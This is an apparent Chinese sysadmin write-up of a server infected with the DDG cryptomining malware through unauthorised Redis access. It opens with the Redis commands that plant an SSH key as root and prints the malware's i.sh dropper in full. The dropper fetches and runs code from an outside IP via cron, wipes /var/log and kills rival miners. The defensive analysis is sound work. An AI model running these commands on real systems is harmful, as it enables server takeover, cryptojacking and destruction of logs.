cat foo | redis-cli -h 12.34.56.78 -x set crackit
redis-cli -h 12.34.56.78
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
远程登录目标服务器
ssh root@12.34.56.78
解决步骤:
关闭
redis
未授权端口
清理被写入的
authorized_keys
清除
/var/spool/cron
目录下的定时任务
杀死进程
qW3xT.4
和
ddgs.3016
删除
/tmp
下的执行文件
qW3xT.4
和
ddgs.3016
分析如下:
服务器
top
占用,存在两个异常线程
qW3xT.4
,
ddgs.3016
定位两个进程的位置
linux在启动一个进程时,系统会在
/proc
下创建一个以PID为名称的文件夹,在这个文件夹下有这个进程的详细信息
exe符号连接
就是执行程序的绝对路径;执行程序在
/tmp
下
find / -name qW3xT.4
,
find / -name ddgs.3016
;执行程序在
/tmp
清除
/tmp
下的两个执行文件,过一会儿会再次生成.
/var/spool/cron
目录下 存在计划任务
root
(或
crontab -l
&&
crontab -r
查询且清除)
*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh
计划任务抓取拉取的
i.sh
如下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
rm -rf /var/cache /var/log
ps auxf | grep -v grep | grep /tmp/ddgs.3016 || rm -rf /tmp/ddgs.3016
if [ ! -f "/tmp/ddgs.3016" ]; then
wget -q http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) -O /tmp/ddgs.3016
curl -fsSL http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) -o /tmp/ddgs.3016
chmod +x /tmp/ddgs.3016 && /tmp/ddgs.3016
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
1. 下载自身并执行写入定时任务
2. `rm -rf /var/cache /var/log`清空系统登录日志
3. 下载主文件`ddgs.3016`并执行
4. 杀死系统中的其他挖矿进程
去脚本中的地址http://216.155.135.37:8000/static/查看,存在如下文件
disable.sh如下:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /usr/bin/bsd-port/getty | awk '{print $2}' | xargs kill
复制代码
此脚本也是限制其他挖空程序运行, yilu 地址https://www.yiluzhuanqian.com/
吾爱破解上对此病毒3014的分析
DDG最新变种3014样本分析
